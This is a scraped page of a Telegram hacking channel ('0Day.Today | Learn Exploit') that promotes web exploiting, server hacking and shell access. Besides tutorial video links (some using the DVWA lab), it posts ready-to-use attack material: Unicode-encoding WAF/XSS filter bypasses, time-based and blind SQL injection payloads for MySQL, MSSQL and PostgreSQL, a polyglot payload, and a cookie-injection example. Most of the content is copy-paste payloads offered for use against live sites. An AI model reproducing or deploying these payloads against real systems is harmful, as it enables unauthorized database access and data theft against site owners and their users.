0Day.Today | Learn Exploit | Zero World | Dark web |
19.5K subscribers
1.24K photos
128 videos
489 files
1.29K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
Media is too big
VIEW IN TELEGRAM
آموزش Sql Injection
اینجکت دستی سایت و بیرون کشیدن دیتابیس سایت به صورت دستی

#SQL #LearnSQL
#SQL_INJECTION
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش Sql injection در محیط dvwa
cryptii

#sql_injection #sql #dvwa

iliyahr
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
آموزش Blind Sql injection در محیط Dvwa

#sql_injection #sql #dvwa

iliyahr
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
XSS/WAF/SQL filter bypass.

< - %EF%BC%9C (\uff1c)
> - %EF%BC%9E (\uff1e)
\ - %EF%BC%BC (\uff3c)
/ - %EF%BC%8F (\uff0f)
' - %EF%BC%87 (\uff07)
" - %EF%BC%82 (\uff02)

#bypass #xss #waf #sql
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍13🍾2
SQL injection payload :

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'

#payload #SQL
——————
0Day.Today
@LearnExploit
@Tech_Army
👍123❤‍🔥2
Time sleep sql injection ⚡️

Payload:
'XOR(if(now()=sysdate(),sleep(33),0))OR'

#sql #sql_injection #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
6
sql injection payload

14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515

#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
3
SQL Injection

GET 
/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/Folder/
HTTP/1.1


#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
7
Sql Injection Payload

Payload : 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z

#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥6👍1
Blind SQL Injection payload

if(now()=sysdate()%2Csleep(10)%2C0)

#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
5👍2❤‍🔥1
7 SQLs

4 in php

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1 in aspx

orwa';%20waitfor%20delay%20'0:0:6'%20--%20

2 in graphql

orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--

#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥9❤‍🔥3👍2
Found SQL Injection in [org_id] Cookie
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE
-1 OR 6=6 AND 0-0=> TRUE

Injected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0

#BugBounty #Tips #SQL

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
72🔥1💯1